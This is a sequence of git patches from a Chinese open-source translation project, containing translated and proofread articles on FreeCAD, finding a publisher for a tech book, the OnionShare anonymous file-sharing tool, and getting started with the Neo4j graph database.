Linux.md @@ -1,45 +1,34 @@ -FreeCAD - Linux 下的 3D 建模和设计软件 +FreeCAD:Linux 下的 3D 建模和设计软件 ============================================================ + ![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png) -[FreeCAD][8]是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。 +[FreeCAD][8] 是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。 -它有基于 QT 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。 +它有基于 Qt 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。 [![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9] -FreeCAD 3D 软件 +*FreeCAD 3D 软件* 正如在网站上所列出的,FreeCAD 有一些使用案例,即: -> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前的 CAD 经验。我们的社区将帮助你快速掌握它! -> +> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前具有 CAD 经验。我们的社区将帮助你快速掌握它! > * 有经验的 CAD 用户:如果你在工作中使用商业 CAD 或 BIM 建模软件,你会在 FreeCAD 的许多工作台中找到类似的工具和工作流程。 -> > * 程序员:几乎所有的 FreeCAD 功能都可以用 Python 访问。你可以轻松扩展 FreeCAD 的功能,使用脚本将其自动化,创建自己的模块,甚至将 FreeCAD 嵌入到自己的程序中。 -> > * 教育者:教给你的学生一个免费的软件,不用担心购买许可证。他们可以在家里安装相同的版本,并在离开学校后继续使用它。 -#### FreeCAD 中的功能 +### FreeCAD 中的功能 * 免费软件:FreeCAD 免费供所有人下载和使用。 - * 开源:在 [GitHub][4] 上开源。 - * 跨平台:所有的 Windows、Linux 和 Mac 用户都可以享受 FreeCAD 的功能。 - * 全面的[在线文档][5]。 - * 一个给初学者和专业人士的免费[在线手册][6]。 - * 注释支持。例如:文字和尺寸。 - * 内置的 Python 控制台。 - * 完全可定制和脚本化的用户界面。 - * [这里][7]有展示项目的在线社区。 - * 用于建模和设计各种物体的可扩展模块。 FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请随时在其网站的[功能页面][11]上查看其余的功能。 @@ -48,7 +37,7 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请 尝试一下它,看看你是否不喜欢它。 -[下载 Linux 下的 FreeCAD][13] +- [下载 Linux 下的 FreeCAD][13] 准备成为 FreeCAD 用户了么?你最喜欢哪个功能?你有没有遇到过与它功能相近的其他软件? @@ -58,9 +47,9 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请 via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/ -作者:[Martins D. Okoi ][a] +作者:[Martins D. Okoi][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c69d987e9d7d350de02debbe79e80e0de3ca5dda Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 08:13:17 +0800 Subject: [PATCH 0693/1627] PRF:20171201 How to find a publisher for your tech book.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 翻译的很好。 --- ... to find a publisher for your tech book.md | 72 +++++++++++++------ 1 file changed, 50 insertions(+), 22 deletions(-) diff --git a/translated/tech/20171201 How to find a publisher for your tech book.md b/translated/tech/20171201 How to find a publisher for your tech book.md index 755e6a1d5c..4f27cba2b7 100644 --- a/translated/tech/20171201 How to find a publisher for your tech book.md +++ b/translated/tech/20171201 How to find a publisher for your tech book.md @@ -1,46 +1,74 @@ -Translated by FelixYFZ - 如何为你的科技书籍找到出版商 ============================================================ -### 想去写一本科技书籍是一个好的想法,但你还需要去了解一下出版业的运作过程。 +> 想去写一本科技书籍是一个好的想法,但你还需要去了解一下出版业的运作过程。 ![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") -Image by : opensource.com -你已经有了一个写一本科技书籍的想法,祝贺你!就像徒步旅行一样,或者是去学做一种甜点心,写一本书就像人们讨论的那些事情中一种,但是却都只停留在思考的初级阶段。 那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你将缺少足够的资源信息来完成它。如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是Pragmatci Bookshelf的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。 有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 +你有一个写本科技书籍的想法,那么祝贺你!就像徒步旅行,或者是去学做一种甜点心,写一本书就像人们说的那些事情一样,但是却都只停留在思考的初级阶段。那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你缺少如何完成它的足够信息。 + +如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是 [Pragmatci Bookshelf][4] 的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 ### 鉴别出你的目标 -你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的开始将会大大缩小你的查搜素范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来 -下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如C++或者Java. 你以Elixir为主题的就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的思想相符合或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在技术领域的新的方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言文学或者图书一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们读者群体。他们的评估标准可能和你的是不以一样的。唯一的途径是通过投稿来试探。 +你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的出版商开始将会大大缩小你的搜索范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来 + +下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,但他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如 C++ 或者 Java。你以 Elixir 为主题的书籍就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。 + +一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的书籍的主题一样或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在该技术领域里的新方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。 + +如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言或者类库一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们的读者群体。他们的评估标准可能和你的是不一样的。唯一的途径是通过投稿来试探。 ### 建立起你自己的网络 -鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,你认识出版商的什么职位的人永远比任何其他的更重要。你最想认识的那个人是一个去发现新市场,新作者和新提议的组稿编辑。如果你认识某个和出版商有关系的人,请求他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块编辑通常会很乐意将你介绍给符合你的主题的编辑。有时候你也许能够在一个技术论坛展会上发现一个组稿编辑,特别是主办者是出版商,而且还有一个展台,即使在在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果这个论坛不符合你的主题思想, 你需要利用你的社交网络来获得别人的推荐。使用LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己当书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一 -最坏的结果就是他们忽视你而已。 一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 -### 如果其他的方法都失败了 -如果你无法找到一名组稿编辑,出版商通常会有一个匿名提案的方式,通常是`proposals@[publisher].com`的格式。 查找他们网站的介绍如何去发送一个匿名提案;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为匿名提案并不能得到你想要的答复,整理他们对你的要求(一篇独立的主题文章)发给他们,然后就去期望能够得到满意的答复。 +鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,出版业你认识的人却往往不是你所需要找的人。你需要认识的那个人是一个去发现新市场、新作者和新选题的组稿编辑。如果你认识某个和出版商有关系的人,请他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块的编辑通常会很乐意将你介绍给符合你的主题的编辑。 + +有时候你也许能够在一个技术论坛展会上找到一个组稿编辑,特别是出版商是赞助商,而且还有一个展台时。即使在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果论坛不符合你的主题思想,你需要利用你的社交网络来获得别人的推荐。使用 LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。 + +对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己的书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一。最坏的结果只不过是他们忽视你而已。 + +一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 + +### 如果其它的方法都失败了 + +如果你无法找到一名组稿编辑,出版商通常会有一个书稿盲投proposal alias的方式,通常是 `proposals@[publisher].com` 的格式。 查找他们网站的介绍找到如何去发送书稿;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃,不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为书稿并不能回答那些问题。整理他们对你的要求(一篇独立的主题文章),发给他们,然后就去期望能够得到满意的答复。 -### 然后就是......等待 -无论你和一个出版商有着多么密切的联系,你也将不得不等待着,如果你已经投递了书稿,也许要过一段时间才有有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位选稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在顾客之一,所以你可能不会很快得到答复,几乎所有的出版商都会在最终确认之前召开一次组委会,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们任然没有回复你也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。 +### 然后就是……等待 + +无论你和一个出版商有着多么密切的联系,你也得等待着。如果你已经投递了书稿,也许要过一段时间才有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位组稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在目标之一,所以你可能不会很快得到答复。几乎所有的出版商都会在最终确认之前召开一次组委会来决定接受哪个稿件,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。 + +几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们仍然回复,也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你,也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。 ### 好运气 -如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方,合适的时间,和合适的人探讨,而且还要期待他们 -此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的SeaGLS上,有一个对整个过程的介绍指导。去看看那个视屏获得更多的细节信息。 + +如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方、合适的时间,和合适的人探讨,而且还要期待他们此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。 + +寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的 SeaGLS 上,我对整个过程的介绍指导有个[演讲][5]。去看看那个[视频][6]获得更多的细节信息。 ### 关于作者 - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] -麦克唐纳-麦克唐纳先生现在在Pragmatic Bookshelf主管编辑。在过去的20年里,在科学技术领域,他是一名编辑,一名作者,偶尔还去做演讲者 -或者训练师。他现在把大量的时间都用来去和新作者探讨如何能都更好的表达出他们的想法。你可以关注他的推特@bmac_editor. -[More about me][2] + +[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] + +麦克唐纳先生现在是 Pragmatic Bookshelf 的主管编辑。在过去的 20 年里,在技术出版领域,他是一名编辑、一名作者、偶尔还去客串演讲者或者讲师。他现在把大量的时间都用来去和新作者探讨如何更好的表达出他们的想法。你可以关注他的推特@bmac_editor。 -------------------------------------------------------------------------------- via: https://opensource.com/article/17/12/how-find-publisher-your-book -作者:[Brian MacDonald ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) +作者:[Brian MacDonald][a] +译者:[FelixYFZ](https://github.com/FelixYFZ) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/bmacdonald +[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s +[2]:https://opensource.com/users/bmacdonald +[3]:https://opensource.com/user/190176/feed +[4]:https://pragprog.com/ +[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[7]:https://opensource.com/users/bmacdonald +[8]:https://opensource.com/users/bmacdonald +[9]:https://opensource.com/users/bmacdonald +[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments From 27cde37f973d72453e4b0daa04a36ff3659dbdf0 Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 19 Dec 2017 09:00:52 +0800 Subject: [PATCH 0694/1627] translated --- ...08 OnionShare - Share Files Anonymously.md | 79 ------------------- ...08 OnionShare - Share Files Anonymously.md | 77 ++++++++++++++++++ 2 files changed, 77 insertions(+), 79 deletions(-) delete mode 100644 sources/tech/20171208 OnionShare - Share Files Anonymously.md create mode 100644 translated/tech/20171208 OnionShare - Share Files Anonymously.md diff --git a/sources/tech/20171208 OnionShare - Share Files Anonymously.md b/sources/tech/20171208 OnionShare - Share Files Anonymously.md deleted file mode 100644 index 473a0905ad..0000000000 --- a/sources/tech/20171208 OnionShare - Share Files Anonymously.md +++ /dev/null @@ -1,79 +0,0 @@ -translating---geekpi - -OnionShare - Share Files Anonymously -====== -In this Digital World, we share our media, documents, important files via the Internet using different cloud storage like Dropbox, Mega, Google Drive and many more. But every cloud storage comes with two major problems, one is the Size and the other Security. After getting used to Bit Torrent the size is not a matter anymore, but the security is. - -Even though you send your files through the secure cloud services they will be noted by the company, if the files are confidential, even the government can have them. So to overcome these problems we use OnionShare, as per the name it uses the Onion internet i.e Tor to share files Anonymously to anyone. - -### How to Use **OnionShare**? - - * First Download the [OnionShare][1] and [Tor Browser][2]. After downloading install both of them. - - - -[![install onionshare and tor browser][3]][3] - - * Now open OnionShare from the start menu - - - -[![onionshare share files anonymously][4]][4] - - * Click on Add and add a File/Folder to share. - * Click start sharing. It produces a .onion URL, you could share the URL with your recipient. - - - -[![share file with onionshare anonymously][5]][5] - - * To Download file from the URL, copy the URL and open Tor Browser and paste it. Open the URL and download the Files/Folder. - - - -[![receive file with onionshare anonymously][6]][6] - -### Start of **OnionShare** - -A few years back when Glenn Greenwald found that some of the NSA documents which he received from Edward Snowden had been corrupted. But he needed the documents and decided to get the files by using a USB. It was not successful. - -After reading the book written by Greenwald, Micah Lee crypto expert at The Intercept, released the OnionShare - simple, free software to share files anonymously and securely. He created the program to share big data dumps via a direct channel encrypted and protected by the anonymity software Tor, making it hard to get the files for the eavesdroppers. - -### How Does **OnionShare** Work? - -OnionShare starts a web server at 127.0.0.1 for sharing the file on a random port. It chooses any of two words from the wordlist of 6800-wordlist called slug. It makes the server available as Tor onion service to send the file. The final URL looks like: - -`http://qx2d7lctsnqwfdxh.onion/subside-durable` - -The OnionShare shuts down after downloading. There is an option to allow the files to be downloaded multiple times. This makes the file not available on the internet anymore. - -### Advantages of using **OnionShare** - -Other Websites or Applications have access to your files: The file the sender shares using OnionShare is not stored on any server. It is directly hosted on the sender's system. - -No one can spy on the shared files: As the connection between the users is encrypted by the Onion service and Tor Browser. This makes the connection secure and hard to eavesdroppers to get the files. - -Both users are Anonymous: OnionShare and Tor Browser make both sender and recipient anonymous. - -### Conclusion - -In this article, I have explained how to **share your documents, files anonymously**. I also explained how it works. Hope you have understood how OnionShare works, and if you still have a doubt regarding anything, just drop in a comment. - - --------------------------------------------------------------------------------- - -via: https://www.theitstuff.com/onionshare-share-files-anonymously-2 - -作者:[Anirudh Rayapeddi][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.theitstuff.com -[1]https://onionshare.org/ -[2]https://www.torproject.org/projects/torbrowser.html.en -[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png -[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png -[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png -[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png diff --git a/translated/tech/20171208 OnionShare - Share Files Anonymously.md b/translated/tech/20171208 OnionShare - Share Files Anonymously.md new file mode 100644 index 0000000000..f501bea881 --- /dev/null +++ b/translated/tech/20171208 OnionShare - Share Files Anonymously.md @@ -0,0 +1,77 @@ +OnionShare - 匿名共享文件 +====== +在这个数字世界中,我们通过互联网使用 Dropbox、Mega、Google Drive 等不同云存储分享我们的媒体、文档和重要文件。但是每个云存储都有两个主要问题,一个是大小和另一个安全。习惯 Bit Torrent 之后,大小已经不是问题了,但安全性仍旧是。 + +你即使通过安全云服务发送文件,公司也会注意到这些文件,如果这些文件是保密的,政府甚至可以拥有它们。因此,为了克服这些问题,我们使用 OnionShare,如它的名字那样它使用洋葱网络也就是 Tor 来匿名分享文件给任何人。 + +### 如何使用 **OnionShare**? + + * 首先下载 [OnionShare][1] 和 [Tor浏览器][2]。下载后安装它们。 + + + +[![install onionshare and tor browser][3]][3] + + * 现在从开始菜单打开 OnionShare + + + +[![onionshare share files anonymously][4]][4] + + * 点击添加并添加一个文件/文件夹共享。 +  * 点击开始分享。它会产生一个 .onion 网址,你可以与你的收件人分享这个网址。 + + + +[![share file with onionshare anonymously][5]][5] + + * 从 URL 下载文件,复制 URL 并打开 Tor 浏览器并粘贴。打开 URL 并下载文件/文件夹。 + + + +[![receive file with onionshare anonymously][6]][6] + +### **OnionShare** 的开始 + +几年前,Glenn Greenwald 发现他从 Edward Snowden 收到的一些 NSA 的文件已经被损坏。但他需要文件,并决定通过使用 USB 获取文件。这并不成功。 + +在阅读了 Greenwald 写的书后,The Intercept 的安全专家 Micah Lee 发布了 OnionShare - 一个简单的免费软件,可以匿名和安全地共享文件。他创建了一个程序,通过一个被匿名软件 Tor 加密和保护的直接通道来共享大数据转储,使窃取者难以获取文件。 + +### **OnionShare** 如何工作? + +OnionShare 在 127.0.0.1 上启动了一个 Web 服务器,用于在随机端口上共享文件。它从有 6880 个单词的单词列表中选择任意两个单词,称为 slug。它使服务器可以作为 Tor 洋葱服务发送文件。最终的 URL 看起来像这样: + +`http://qx2d7lctsnqwfdxh.onion/subside-durable` + +OnionShare 在下载后关闭。有一个选项允许多次下载文件。这使得该文件不再在互联网上可以得到。 + +### 使用 **OnionShare** 好处 + +其他网站或程序可以访问你的文件:发件人使用 OnionShare 共享的文件不存储在任何服务器上。它直接托管在发件人的系统上。 + +没有人可以窥探共享文件:由于用户之间的连接是由洋葱服务和 Tor 浏览器加密的。这使得连接安全,很难窃取文件。 + +用户双方都是匿名的:OnionShare 和 Tor 浏览器使发件人和收件人匿名。 + +### 结论 + +在这篇文章中,我已经解释了如何**匿名分享你的文档、文件**。我也解释了它是如何工作的。希望你了解 OnionShare 是如何工作的,如果你对任何事情仍有疑问,只需留言。 + + +-------------------------------------------------------------------------------- + +via: https://www.theitstuff.com/onionshare-share-files-anonymously-2 + +作者:[Anirudh Rayapeddi][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.theitstuff.com +[1]https://onionshare.org/ +[2]https://www.torproject.org/projects/torbrowser.html.en +[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png +[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png +[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png +[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png From fd5865c2a0121a43e826d29b25634eb1b2a6b52c Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 19 Dec 2017 09:02:42 +0800 Subject: [PATCH 0695/1627] translating --- sources/tech/20171218 Whats CGManager.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171218 Whats CGManager.md b/sources/tech/20171218 Whats CGManager.md index af2eb7673e..9a1c25969e 100644 --- a/sources/tech/20171218 Whats CGManager.md +++ b/sources/tech/20171218 Whats CGManager.md @@ -1,3 +1,5 @@ +translating---geekpi + What's CGManager?[][1] ============================================================ From de3ec1305306b854286525e7a8a88304edeeb5fc Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:10:01 +0800 Subject: [PATCH 0696/1627] Update 20170717 Neo4j and graph databases Getting started.md --- ...o4j and graph databases Getting started.md | 66 +++++++++---------- 1 file changed, 30 insertions(+), 36 deletions(-) diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md index 00f9c88280..2bbe9eaaca 100644 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -1,120 +1,114 @@ happygeorge01 is translating -Neo4j and graph databases: Getting started +Neo4j 和图数据库: 开始 ============================================================ -### In the second of a three-part series, install Neo4j and start using the web client to insert and query data in the graph. +### 这是三篇文章系列中的第二篇,安装Neo4j并通过使用网页端在图中插入和查询数据。 -![Neo4j and graph databases: Getting started](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") -Image by :  +![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") +图片来源 :  opensource.com -In the [first article][8] in this series, we explored some core concepts of graph databases. This time, we'll install the [Neo4j][9] application and begin using the web client to insert and query data in the graph. +在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 -To download the Community Edition of Neo4J [head for their website][10]! You can download a package for Windows or OSX that will work just fine for testing, and there are links for installations on most Linux distros, and via Docker. +下载社区版的Neo4j可通过此 [传送门][10]!你可以下载Windows或OSX版来测试,也有各Linux发行版对应的版本,还有Docker版。 -I'll be installing the software on Debian 9 (stretch). You can get [full instructions here][11]. If you're running Debian 8 (jessie) or older, you can install the current Neo4j package, but it will be a bit more difficult as Neo4j requires the Java 8 runtime, which is not packaged with jessie. +我会在Debian 9 (stretch)上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是jessie中并没有安装Neo4j运行所需要的Java 8环境。 ``` wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j ``` -On my system, I had to create **/var/run/neo4j**, for some reason, and then it started easily. I got a warning about maximum open files, but that turned out to be a non-issue since this is just a test. By default, Neo4j will listen for connections only on localhost. This is fine, if your Debian box is a desktop, but mine isn't. I edited **/etc/neo4j/neo4j.conf** and uncommented this line: +在我的系统中,因为有些不可知的原因,只有在我创建 **/var/run/neo4j** 之后才会它正常启动。Neo4j 也给了最大打开文件数 (maximum open files) 的警告,但因为是测试环境所以不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 。无论我使用的是服务器而你使用的 Debian 是台式机都是可以的。同时我在 **/etc/neo4j/neo4j.conf** 中取消注释了下面这行: ``` dbms.connectors.default_listen_address=0.0.0.0 ``` -After stopping and restarting Neo4j, I was able to connect by browsing to the server on port 7474\. The default password for the Neo4j user is **neo4j**; you'll have to set a new password, then the startup screen will display: - -### [article_2_image_1.jpg][1] +在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 Neo4j 和 **neo4j**; 你需要设置一个新密码,然后会出现初始页面: +### [Installing.jpg][1] ![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") -Let's use the graph from the last article, and create it in Neo4j. Here it is again: +我们在Neo4j上创建上篇文章中使用过的图。如下图: -### [article_1_image_2.jpg][2] +### [图数据库节点图_2.jpg][2] ![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node") -Like MySQL and other database systems, Neo4j uses a query system for all operations. Cypher, the query language of Neo4j, has some syntactic quirks that take a little getting used to. Nodes are always encased in parentheses and relationships in square brackets. Since that's the only type of data there is, that's all you need. 